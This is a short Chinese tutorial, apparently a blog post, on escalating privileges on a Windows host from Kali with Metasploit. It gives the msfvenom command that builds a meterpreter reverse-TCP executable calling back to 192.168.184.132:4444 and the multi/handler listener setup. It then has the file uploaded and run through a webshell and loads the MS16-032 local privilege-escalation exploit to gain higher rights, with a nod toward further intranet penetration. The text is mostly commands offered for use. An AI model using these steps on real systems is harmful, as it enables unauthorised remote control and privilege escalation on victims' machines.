kali下msf提权

  1. 生成木马

 

Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe

kali下msf提权_第1张图片

 

  1. 配置监听程序

  Msfconsole 打开Metaploit

kali下msf提权_第2张图片

kali下msf提权_第3张图片

 

msf > use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.184.132

Exploit

 

 

 

现在将1.exe 通过菜刀或者webshell 上次到可写目录,并且执行

kali下msf提权_第4张图片

这样就监听成功了  获得一个session (会话)

 

Getuid 查看主机名

 

shell 进入命令行模式

kali下msf提权_第5张图片

kali下msf提权_第6张图片

 

当然这里也可以加载exp

Exit 返回到meterpeter模式

Background 返回 multi/handler

kali下msf提权_第7张图片

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 加载exp

 

Session 1 返回之前的会话

Exploit 进行提权

kali下msf提权_第8张图片

 

这说明exp执行成功,可以进一步提权,内网渗透了

 

你可能感兴趣的:(kali下msf提权)